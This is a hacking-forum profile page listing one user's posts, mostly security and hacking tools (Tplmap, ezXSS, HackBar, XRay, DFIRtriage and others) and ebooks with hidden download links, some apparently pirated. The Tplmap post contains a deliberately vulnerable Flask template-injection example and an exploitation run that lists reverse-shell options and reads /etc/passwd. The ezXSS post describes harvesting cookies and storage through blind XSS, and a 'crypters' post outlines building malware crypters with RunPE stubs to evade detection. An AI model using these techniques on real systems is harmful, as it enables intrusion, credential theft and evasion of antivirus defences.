0x1

Collaborator
  • Content Count

    811
  • Avg. Content Per Day

    0
  • Joined

  • Last visited

  • Days Won

    6

0x1 last won the day on December 3 2015

0x1 had the most liked content!

Community Reputation

5,386 Excellent

6 Followers

About 0x1

  • Rank
    LeVeL23 HacKerS TeaM
  • Birthday 03/03/1900

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. 0x1

    AppSpider 7.2

    Web application security testing to close the gaps in your apps SPAs, APIs, mobile—the evolution of application technology is measured in months, not years. Is your web application security testing tool designed to keep up? AppSpider lets you collect all the information needed to test all the apps so that you aren’t left with gaping application risks. Our dynamic application security testing (DAST) solution crawls to the deepest, darkest corners of even the most modern and complex apps to effectively test for risk and get you the insight you need to remediate faster. With AppSpider on your side (or, rather, all of your sides), you’ll be able to scan all the apps today and always be ready for whatever comes next. Download && More info [Hidden Content]
  2. 0x1

    Burp Suite 2.1.05 Pro

    This release adds experimental support for using Burp's embedded Chromium browser to perform all navigation while scanning. This new approach will provide a robust basis for future capabilities in Burp Scanner, enabling it to eventually deal with any client-side technologies and navigational structures that a modern browser is able to deal with. It has the potential to dramatically improve coverage of the scan, during both the crawling and auditing phases. In this initial release, Burp Scanner now correctly deals with: Applications that dynamically construct the navigational UI (links and forms) using JavaScript. Applications that dynamically mutate the request when a link is clicked or a form is submitted, using JavaScript event handlers. There are numerous caveats at this stage: Performance is poor and will be improved considerably over the next few releases. Navigational elements other than links and forms are not yet supported (such as DIV elements with an onclick handler that makes a request). Asynchronous requests such as XHR are honored during navigation but are not audited. Navigational actions that mutate the existing DOM without causing a request to the server are not properly handled. Frames and iframes are not properly supported. File uploads are not supported. The new feature is currently experimental, and is being released to gather feedback from users who want to play with the new capability and assess its effectiveness. The new feature is not currently a suitable replacement for the existing default scanning mode: you are likely to gain some coverage of JavaScript-heavy applications, but also lose some coverage and experience poor performance. Rest assured that over the coming months the new feature will be considerably enhanced until it becomes a robust and superior replacement to the existing scanning mode. To enable experimental support for browser-based scan navigation, create a new scan, add a crawl configuration, and under "Miscellaneous" select "Use embedded browser for navigation". You can also configure whether to allow the browser to fetch page resources that are out-of-scope. The release also includes various other bugfixes. The embedded JRE that is included in Burp's installer has been updated to Java 12. Download [Hidden Content]
  3. 0x1

    dfirtriage

    Digital forensic acquisition tool for Windows-based incident response. How to Use To run, drop dfirtriage.exe on the target and execute with admin rights. DFIRTriage v4.0.0 User's Manual Description This document outlines the functionality and proper use of the DFIRtriage tool. Also included is detailed information to help with analysis of the output. About DFIRtriage is a tool intended to provide Incident Responders with rapid host data. Written in Python, the code has been compiled to eliminate the dependency of python on the target host. The tool will run a variety of commands automatically upon execution. The acquired data will reside in the root of the execution directory. DFIRTriage may be ran from a USB drive or executed in remote shell on the target. Windows-only support. What’s New? *General Efficiency updates were made to the code improving flow, cleaning up bugs, and providing performance improvements. Cleaned up the output directory structure Removed TZworks tools from toolset avoiding licensing issues Added commandline arguments for new functionality (run "DFIRtriage --help" for details) *Memory acquisition memory is now acquired by default argument required to bypass memory acquisition free space check conducted prior to acquiring memory updated acquisition process to avoid Windows 10 crashes *New artifacts windowsupdate.log file Windows Defender scan logs PowerShell command history HOSTS files netstat output now includes associated PID for all network connections logging all users currently logged in to the target machine to the Triage_info.txt file Pulling dozens of new events from the Windows Event logs *New! DFIRtriage search tool Conducts keyword search across DFIRtriage output data and writes findings to log file The search tool is a separate executable (dtfind.exe) Double-click to run or run from the command line (eg. dtfind -kw badstuff.php) Dependencies The tool repository contains the full toolset required for proper execution and is packed into a single a single file named “core.ir”. This “.ir” file is the only required dependency of DFIRtriage when running in Python and should reside in a directory named data, (ie. "./data/core.ir"). The compiled version of DFIRtriage has the full toolset embedded and does not require the addition of the "./data/core.ir" file. NOTE: TZWorks utilities are no longer utilized. Contents DFIRtriage.exe compiled executable .\data\core.ir tool set repository (required for Python version only) manifest.txt file hashes for core components unlicense.txt copy of license agreement source directory DFIRtriage-v4-pub.py dtfind.exe compiled search tool executable Operation DFIRtriage acquires data from the host on which it is executed. For acquisitions of remote hosts, the DFIRtriage files will need to be copied to the target, then executed via remote shell. (ie. SSH or PSEXEC) PSEXEC Usage WARNING: Do not use PSEXEC arguments to pass credentials to a remote system for authentication. Doing so will send your username and password across the network in the clear. The following steps should be taken for proper usage of PSEXEC Map a network drive and authenticate with an account that has local administrative privileges on the target host. You can used this mapped connection to copy DFIRtriage to the target. We can now shovel a remote shell to the target host using PSEXEC. psexec \target_host cmd You now have a remote shell on the target. All commands executed at this point are done so on the target host. Usage Once the remote shell has been established on the target you can change directory to the location of the extracted DFIRtriage.exe file and execute. Memory acquisition occurs by default, no arguments needed. To bypass memory acquisition, the "--nomem" argument can be passed. DFIRtriage must be executed with Administrative privileges. Output Analysis Once complete, press enter to cleanup the output directory. If running the executable, the only data remaining with be a zipped archive of the output as well as DFIRtriage.exe. If running the Python code directly only DFIRtriage-v4-pub.py and a zipped archive of the output are left. Output Folder The output folder name includes the target hostname and a date/time code indicating when DFIRtriage was executed. The date/time code format is YYYYMMDDHHMMSS. Artifacts List The following is a general listing of the information and artifacts gathered. Memory Raw --> image acquisition (optional) Prefetch --> Collects all prefetch files an parses into a report PowerShell command history --> Gathers PowerShell command history for all users User activity --> HTML report of recent user activity File hash --> MD5 hash of all files in root of System32 Network information --> Network configuration, routing tables, etc Network connections --> Established network connections DNS cache entries --> List of complete DNS cache contents ARP table information --> List of complete ARP cache contents NetBIOS information --> Active NetBIOS sessions, transferred files, etc Windows Update Log --> Gathers event tracelog information and builds Windows update log Windows Defender Scanlog --> Gathers event tracelog information and builds Windows update log Windows Event Logs --> Gathers and parses Windows Event Logs Process information --> Processes, PID, and image path List of remotely opened files --> Files on target system opened by remote hosts Local user account names --> List of local user accounts List of hidden directories --> List of all hidden directories on the system partition Alternate Data Streams --> List of files containing alternate data streams Complete file listing --> Full list of all files on the system partition List of scheduled tasks --> List of all configured scheduled tasks Hash of all collected data --> MD5 hash of all data collected by DFIRtriage Installed software --> List of all installed software through WMI Autorun information --> All autorun locations and content Logged on users --> All users currently logged on to target system Registry hives --> Copy of all registry hives USB artifacts --> Collects data needed to parse USB usage info Browser History --> browser history collection from multiple browsers Download [hide][Hidden Content]]
  4. 0x1

    Tplmap

    Server-Side Template Injection and Code Injection Detection and Exploitation Tool Tplmap assists the exploitation of Code Injection and Server-Side Template Injection vulnerabilities with a number of sandbox escape techniques to get access to the underlying operating system. The tool and its test suite are developed to research the SSTI vulnerability class and to be used as offensive security tool during web application penetration tests. It can exploit several code context and blind injection scenarios. It also supports eval()-like code injections in Python, Ruby, PHP, Java and generic unsandboxed template engines. Server-Side Template Injection Assume that you are auditing a web site that generates dynamic pages using templates composed with user-provided values, such as this web application written in Python and Flask that uses Jinja2 template engine in an unsafe way. from flask import Flask, request from jinja2 import Environment app = Flask(__name__) Jinja2 = Environment() @app.route("/page") def page(): name = request.values.get('name') # SSTI VULNERABILITY # The vulnerability is introduced concatenating the # user-provided `name` variable to the template string. output = Jinja2.from_string('Hello ' + name + '!').render() # Instead, the variable should be passed to the template context. # Jinja2.from_string('Hello {{name}}!').render(name = name) return output if __name__ == "__main__": app.run(host='0.0.0.0', port=80) From a black box testing perspective, the page reflects the value similarly to a XSS vulnerability, but also computes basic operation at runtime disclosing its SSTI nature. $ curl -g '[Hidden Content]' Hello John! $ curl -g '[Hidden Content]={% raw %}{{7*7}}{% endraw %}' Hello 49! Exploitation Tplmap is able to detect and exploit SSTI in a range of template engines to get access to the underlying file system and operating system. Run it against the URL to test if the parameters are vulnerable. $ ./tplmap.py -u '[Hidden Content]' [+] Tplmap 0.5 Automatic Server-Side Template Injection Detection and Exploitation Tool [+] Testing if GET parameter 'name' is injectable [+] Smarty plugin is testing rendering with tag {% raw %}'{*}'{% endraw %} [+] Smarty plugin is testing blind injection [+] Mako plugin is testing rendering with tag {% raw %}'${*}'{% endraw %} ... [+] Jinja2 plugin is testing rendering with tag {% raw %}'{{*}}'{% endraw %} [+] Jinja2 plugin has confirmed injection with tag {% raw %}'{{*}}'{% endraw %} [+] Tplmap identified the following injection point: GET parameter: name Engine: Jinja2 Injection: {% raw %}{{*}}{% endraw %} Context: text OS: linux Technique: render Capabilities: Shell command execution: ok Bind and reverse shell: ok File write: ok File read: ok Code evaluation: ok, python code [+] Rerun tplmap providing one of the following options: --os-shell Run shell on the target --os-cmd Execute shell commands --bind-shell PORT Connect to a shell bind to a target port --reverse-shell HOST PORT Send a shell back to the attacker's port --upload LOCAL REMOTE Upload files to the server --download REMOTE LOCAL Download remote files Use --os-shell option to launch a pseudo-terminal on the target. $ ./tplmap.py --os-shell -u '[Hidden Content]' [+] Tplmap 0.5 Automatic Server-Side Template Injection Detection and Exploitation Tool [+] Run commands on the operating system. linux $ whoami www linux $ cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh Supported template engines Tplmap supports over 15 template engines, unsandboxed template engines and generic eval()-like injections. Engine Remote Command Execution Blind Code evaluation File read File write Mako ✓ ✓ Python ✓ ✓ Jinja2 ✓ ✓ Python ✓ ✓ Python (code eval) ✓ ✓ Python ✓ ✓ Tornado ✓ ✓ Python ✓ ✓ Nunjucks ✓ ✓ JavaScript ✓ ✓ Pug ✓ ✓ JavaScript ✓ ✓ doT ✓ ✓ JavaScript ✓ ✓ Marko ✓ ✓ JavaScript ✓ ✓ JavaScript (code eval) ✓ ✓ JavaScript ✓ ✓ Dust (<= [email protected]) ✓ ✓ JavaScript ✓ ✓ EJS ✓ ✓ JavaScript ✓ ✓ Ruby (code eval) ✓ ✓ Ruby ✓ ✓ Slim ✓ ✓ Ruby ✓ ✓ ERB ✓ ✓ Ruby ✓ ✓ Smarty (unsecured) ✓ ✓ PHP ✓ ✓ PHP (code eval) ✓ ✓ PHP ✓ ✓ Twig (<=1.19) ✓ ✓ PHP ✓ ✓ Freemarker ✓ ✓ × ✓ ✓ Velocity ✓ ✓ × ✓ ✓ Twig (>1.19) × × × × × Smarty (secured) × × × × × Dust (> [email protected]) × × × × × Burp Suite Plugin See [Hidden Content]
  5. 0x1

    HackBar V2

    Firefox Extension of HackBar without license A HackBar for new firefox (Firefox Quantum). This addon is written in webextension and alternatives to the XUL version of original Hackbar. How to use Press F12 to open hackbar Feature Load, split, execute url from address bar. Custom/add referrer url, User Agent, cookie. Tools: md5, sha1, sha256, rot13 encryption, url, base64 encoding, beautifier json data, sql, xss features. Shortcut Ctrl + Enter to execute FOREVER FREE Download && Code Source [Hidden Content]
  6. 0x1

    ezXSS

    ezXSS ezXSS is an easy way for penetration testers and bug bounty hunters to test (blind) Cross Site Scripting. Current features Some features ezXSS has Easy to use dashboard with statics, payloads, view/share/search reports and more Payload generator Instant email alert on payload Custom javascript payload Enable/Disable screenshots Prevent double payloads from saving or alerting Block domains Share reports with a direct link or with other ezXSS users Easily manage and view reports in the dashboard Secure your login with extra protection (2FA) The following information is collected on a vulnerable page: The URL of the page IP Address Any page referer (or share referer) The User-Agent All Non-HTTP-Only Cookies All Locale Storage All Session Storage Full HTML DOM source of the page Page origin Time of execution Screenshot of the page its just ez Required A host with PHP 7.1 or up A domain name (consider a short one) An SSL if you want to test on https websites (consider Cloudflare or Let's Encrypt for a free SSL) Installation ezXSS is ez to install Clone the repository and put the files in the document root Create an empty database and provide your database information in 'src/Database.php' Visit /manage/install in your browser and setup a password and email Done! That was ez right? Demo [Hidden Content] Download [hide][Hidden Content]]
  7. 0x1

    Trivy

    A Simple and Comprehensive Vulnerability Scanner for Containers, Suitable for CI. Abstract Trivy (tri pronounced like trigger, vy pronounced like envy) is a simple and comprehensive vulnerability scanner for containers. A software vulnerability is a glitch, flaw, or weakness present in the software or in an Operating System. Trivy detects vulnerabilities of OS packages (Alpine, RHEL, CentOS, etc.) and application dependencies (Bundler, Composer, npm, yarn etc.). Trivy is easy to use. Just install the binary and you're ready to scan. All you need to do for scanning is to specify an image name of the container. It is considered to be used in CI. Before pushing to a container registry, you can scan your local container image easily. Features Detect comprehensive vulnerabilities OS packages (Alpine, Red Hat Universal Base Image, Red Hat Enterprise Linux, CentOS, Debian, Ubuntu, Amazon Linux and Distroless) Application dependencies (Bundler, Composer, Pipenv, Poetry, npm, yarn and Cargo) Simple Specify only an image name Easy installation apt-get install, yum install and brew install is possible No pre-requisites such as installation of DB, libraries, etc. (The exception is that you need rpm installed to scan images based on RHEL/CentOS. This is automatically included if you use our installers or the Trivy container image.) High accuracy Especially Alpine Linux and RHEL/CentOS Other OSes are also high DevSecOps Suitable for CI such as Travis CI, CircleCI, Jenkins, etc. Gif Demo More info && Download [hide][Hidden Content]]
  8. 0x1

    Sparrow Wifi

    Sparrow Wifi - Graphical WiFi Analyzer for Linux Next-Gen GUI-based WiFi And Bluetooth Analyzer For Linux Sparrow-wifi has been built from the ground up to be the next generation 2.4 GHz and 5 GHz Wifi spectral awareness tool. At its most basic it provides a more comprehensive GUI-based replacement for tools like inSSIDer and linssid that runs specifically on linux. In its most comprehensive use cases, sparrow-wifi integrates wifi, software-defined radio (hackrf), advanced bluetooth tools (traditional and Ubertooth), traditional GPS (via gpsd), and drone/rover GPS via mavlink in one solution. [NOTE: Check the Raspberry Pi section for updates. A setup script is now included to get the project running on Raspbian Stretch.] Written entirely in Python3, Sparrow-wifi has been designed for the following scenarios: Basic wifi SSID identification Wifi source hunt - Switch from normal to hunt mode to get multiple samples per second and use the telemetry windows to track a wifi source 2.4 GHz and 5 GHz spectrum view - Overlay spectrums from Ubertooth (2.4 GHz) or HackRF (2.4 GHz and 5 GHz) in real time on top of the wifi spectrum (invaluable in poor connectivity troubleshooting when overlapping wifi doesn't seem to be the cause) Bluetooth identification - LE advertisement listening with standard bluetooth, full promiscuous mode in LE and classic bluetooth with Ubertooth Bluetooth source hunt - Track LE advertisement sources or iBeacons with the telemetry window iBeacon advertisement - Advertise your own iBeacons Remote operations - An agent is included that provides all of the GUI functionality via a remote agent the GUI can talk to. Drone/Rover operations - The agent can be run on systems such as a Raspberry Pi and flown on a drone (its made several flights on a Solo 3DR), or attached to a rover in either GUI-controlled or autonomous scan/record modes. The remote agent is JSON-based so it can be integrated with other applications Import/Export - Ability to import and export to/from CSV and JSON for easy integration and revisiualization. You can also just run 'iw dev scan' and save it to a file and import that as well. Produce Google maps when GPS coordinates are available for both discovered SSID's / bluetooth devices or to plot the wifi telemetry over time. Running sparrow-wifi sudo ./sparrow-wifi.py More info && Download: [hide][Hidden Content]]
  9. 0x1

    crypters

    1) you need to chose the code for compil you crypter (C , vb.net, autoIt, vb6, C#, C++) 2) understand encode/decode (base64 - xor - rc4 ) 3) understand the stub && Runpe && Entry Point 4) Use appropried tools to encrypt you stub ...
  10. The official Raspberry Pi Projects Book - Volume 1-2-3 & 4 (2019) The Raspberry Pi is loved the world over by educators and makers thanks to its tiny size and endless possibilities. Find out why it’s loved and how to use it with the latest official Projects Book - we’ve managed to stuff the fourth edition with another 200 pages of inspiring projects, practical tutorials, and definitive reviews. Suitable for beginners and veterans Get involved with the amazing Raspberry Pi community Be inspired by incredible projects made by other people Learn how to make with your Raspberry Pi with our help Find out about the top kits and accessories for your Pi projects And much, much more! Download include book forma pdf Volume 1-2-3 & 4 [hide][Hidden Content]]
  11. Agile Web Development with Rails 5 & 5.1 Learn Rails the way the Rails core team recommends it, along with the tens of thousands of developers who have used this broad, far-reaching tutorial and reference. If you’re new to Rails, you’ll get step-by-step guidance. If you’re an experienced developer, get the comprehensive, insider information you need for the latest version of Ruby on Rails. The new edition of this award-winning classic is completely updated for Rails 5.1 and Ruby 2.4, with information on system testing, Webpack, and advanced JavaScript. Table Of Contents Getting Started Installing Rails Instant Gratification The Architecture of Rails Applications Introduction to Ruby Building an Application The Depot Application Task A: Creating the Application Task B: Validation and Unit Testing Task C : Catalog Display Task D : Cart Creation Task E: A Smarter Cart Task F: Add a Dash of Ajax Task G: Check Out! Task H: Entering Additional Payment Details excerpt Task I: Sending Mail Task J: Logging In Task K: Internationalization Task L: Deployment and Production Depot Retrospective Rails in Depth Finding Your Way Around Rails excerpt Active Record Action Dispatch and Action Controller Action View Migrations Nonbrowser Applications Rails’ Dependencies Rails PluginsWhere to Go from Here Download Included Code Source && Book format: PDF [hide][Hidden Content]]
  12. 0x1

    Beginning C++ 17

    Beginning C++ 17 Learn how to program using the updated C++17 language. You'll start with the basics and progress through step-by-step examples to become a working C++ programmer. All you need are Beginning C++17 and any recent C++ compiler and you'll soon be writing real C++ programs. There is no assumption of prior programming knowledge. All language concepts that are explained in the book are illustrated with working program examples, and all chapters include exercises for you to test and practice your knowledge. Code downloads are provided for all examples from the text and solutions to the exercises. This latest edition has been fully updated to the latest version of the language, C++17, and to all conventions and best practices of so-called modern C++. Beginning C++17 also introduces the elements of the C++ Standard Library that provide essential support for the C++17 language. What You'll Learn Define variables and make decisions Work with arrays and loops, pointers and references, strings, and more Write your own functions, types, and operators Discover the essentials of object-oriented programming Use overloading, inheritance, virtual functions and polymorphism Write generic function templates and class templates Get up to date with modern C++ features: auto type declarations, move semantics, lambda expressions, and more Examine the new additions to C++17 Who This Book Is For Programmers new to C++ and those who may be looking for a refresh primer on the C++17 programming language in general. Download Included Code Source && Book format: EPUB, PDF [hide][Hidden Content]]
  13. 0x1

    jekyll + disqus

    Load disqus on click and hidden footer Copyright 1) YAML code for Jekyll add on you _config.yml info: change username to you name user disqus. disqus: username to add code only if have disqus: name on _config.yml ; only add # to disables disqus {% if site.disqus %} <!-- You Code Here --> {% endif %} 2) CSS code for hidden footer Copyright info: change background color [Hidden Content] 3) Javascript with jQuery to load disqus on click var clicked = false; function load_disqus( disqus_shortname ) { var disqus_trigger = jQuery('#disqus_trigger'), disqus_target = jQuery('#disqus_thread'); if(clicked === false){ if(disqus_target && disqus_trigger) { jQuery.ajaxSetup({ cache:true }); jQuery.getScript('//' + disqus_shortname + '.disqus.com/embed.js'); jQuery.ajaxSetup({ cache:false }); disqus_trigger.remove(); console.log('Disqus loaded.'); } } clicked = true; } 4) Html code to load disqus on click info: {{ site.disqus }} is YAML code for jekyll ; you can replace to you disqus name if you not use jekyll <label onclick="load_disqus('{{ site.disqus }}')" class="text-center " ><strong>Comments</strong></label> <div class="toggle-content"> <div id="disqus_thread"></div> </div> 5) Full code with html + css + js + yml [Hidden Content]
  14. 0x1

    XRay

    XRay is a tool for network OSINT gathering, its goal is to make some of the initial tasks of information gathering and network mapping automatic. How Does it Work? XRay is a very simple tool, it works this way: It'll bruteforce subdomains using a wordlist and DNS requests. For every subdomain/ip found, it'll use Shodan to gather open ports and other intel. If a ViewDNS API key is provided, for every subdomain historical data will be collected. For every unique ip address, and for every open port, it'll launch specific banner grabbers and info collectors. Eventually the data is presented to the user on the web ui. Grabbers and Collectors HTTP Server, X-Powered-By and Location headers. HTTP and HTTPS robots.txt disallowed entries. HTTPS certificates chain ( with recursive subdomain grabbing from CN and Alt Names ). HTML title tag. DNS version.bind. and hostname.bind. records. MySQL, SMTP, FTP, SSH, POP and IRC banners. Notes Shodan API Key The shodan.io API key parameter ( -shodan-key KEY ) is optional, however if not specified, no service fingerprinting will be performed and a lot less information will be shown (basically it just gonna be DNS subdomain enumeration). ViewDNS API Key If a ViewDNS API key parameter ( -viewdns-key KEY ) is passed, domain historical data will also be retrieved. Anonymity and Legal Issues The software will rely on your main DNS resolver in order to enumerate subdomains, also, several connections might be directly established from your host to the computers of the network you're scanning in order to grab banners from open ports. Technically, you're just connecting to public addresses with open ports (and there's no port scanning involved, as such information is grabbed indirectly using Shodan API), but you know, someone might not like such behaviour. If I were you, I'd find a way to proxify the whole process ... #justsaying Manual Compilation Make sure you are using Go >= 1.7, that your installation is working properly, that you have set the $GOPATH variable and you have appended $GOPATH/bin to your $PATH. Then: [Hidden Content] You'll find the executable in the build folder. Usage Usage: xray -shodan-key YOUR_SHODAN_API_KEY -domain TARGET_DOMAIN Options: -address string IP address to bind the web ui server to. (default "127.0.0.1") -consumers int Number of concurrent consumers to use for subdomain enumeration. (default 16) -domain string Base domain to start enumeration from. -port int TCP port to bind the web ui server to. (default 8080) -preserve-domain Do not remove subdomain from the provided domain name. -session string Session file name. (default "<domain-name>-xray-session.json") -shodan-key string Shodan API key. -viewdns-key string ViewDNS API key. -wordlist string Wordlist file to use for enumeration. (default "wordlists/default.lst") Example: # xray -shodan-key yadayadayadapicaboo... -viewdns-key foobarsomethingsomething... -domain fbi.gov ____ ___ \ \/ / \ RAY v 1.0.0b / by Simone 'evilsocket' Margaritelli /___/\ \ \_/ @ Saving session to fbi.gov-xray-session.json @ Web UI running on [Hidden Content] Download [hide][Hidden Content]]
  15. 0x1

    iconifier

    Online Icon Generator for Apple and Favicon Icons iconifier creates all the required Apple Launcher icons using file names that devices expect so you needn't specify the icon locations in your HTML unless you have some special requirements such as different icons for each page or wish to help Android devices find the correct icons. The expected file names are as follows: apple-touch-icon-144x144.png apple-touch-icon-114x114.png apple-touch-icon-72x72.png apple-touch-icon-57x57.png apple-touch-icon.png Transparency Preserved Transparency is preserved so transparent PNG or GIF source files result in transparent PNG Apple Launcher and favicon files. Higher Resolution Multiple Format Favicon iconifier creates fully valid ICO formatted favicon files with multiple embedded sizes of 16 x 16, 24 x 24, 32 x 32, 48 x 48 and 64 x 64 so that the optimum quality favicon will be displayed whichever web browser is being used. A higher quality favicon is desirable especially with retina screens and now that many browers including IE9 are taking advantage of these. Easy One Screen Operation Upload the source image and click on "Iconify" and repeat as necessary. There's no need to go back to the start to re-run iconifier. Easy Download You can download the icons individually or all together in one easy ZIP file. The ZIP file includes a folder so that icons aren't strewn across your desktop or elsewhere when the file is expanded. Most browsers will find the favicon and Apple icons in the root folder of your website. Add the following HTML to your page if necessary to specify other locations, remembering to include the correct path. <link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" /> <link rel="apple-touch-icon" href="/apple-touch-icon.png" /> <link rel="apple-touch-icon" sizes="57x57" href="/apple-touch-icon-57x57.png" /> <link rel="apple-touch-icon" sizes="72x72" href="/apple-touch-icon-72x72.png" /> <link rel="apple-touch-icon" sizes="76x76" href="/apple-touch-icon-76x76.png" /> <link rel="apple-touch-icon" sizes="114x114" href="/apple-touch-icon-114x114.png" /> <link rel="apple-touch-icon" sizes="120x120" href="/apple-touch-icon-120x120.png" /> <link rel="apple-touch-icon" sizes="144x144" href="/apple-touch-icon-144x144.png" /> <link rel="apple-touch-icon" sizes="152x152" href="/apple-touch-icon-152x152.png" /> <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon-180x180.png" /> If you find this tool useful, please share using the buttons below. [hide][Hidden Content]]